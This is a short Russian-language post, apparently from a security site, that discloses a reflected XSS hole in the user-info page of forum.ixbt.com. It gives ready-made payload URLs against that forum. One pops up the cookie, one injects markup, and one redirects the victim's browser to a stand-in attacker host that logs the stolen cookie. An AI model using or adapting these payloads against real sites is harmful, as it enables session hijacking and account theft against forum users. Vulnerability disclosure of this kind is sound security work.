Сёгодня была найдена небольшая уязвимость на forum.ixbt.com.
Заключается она в том, для просмотра «Информации об участниках» имя учатника передаётся во открытом виде и
отсутствует фильтрация символов вроде: <> / и
т.д. Таким образом возможно осуществление атаки на пользователей, например: 

hxxp://forum.ixbt.com/users.cgi?id= info:%3Cscript%3Ealert(document.cookie)
%3C/script%3E -покажет содержание cookie 
hxxp://forum.ixbt.com/users.cgi?id= info:%3Ch1%3Eweb-hack.ru%3C/h1%3E -выведет строку
и т.д. 

Но самое опасное в XSS- возможность вставки javascrip’ов, хотя они выполняются не на сервере, а на клиентской стороне, но через document.location.replace злоумышленник может использовать ссылку, при нажатие на которые будут получены cookie
жертвы, выглядит это примерно так:

http://forum.ixbt.com/users.cgi?id= info:%3Cscript%3Edocument.location.replace
(‘http://hackerZZ.COM/hackerLogscript.php? targetscookie=’+document.cookie); </script>

Это даст возможность передать значение cookie в виде параметра для скрипта hackerLogscript.php и получить cookie (записав их допустим в файл).

SErG (www.web-hack.ru)

Оставить мнение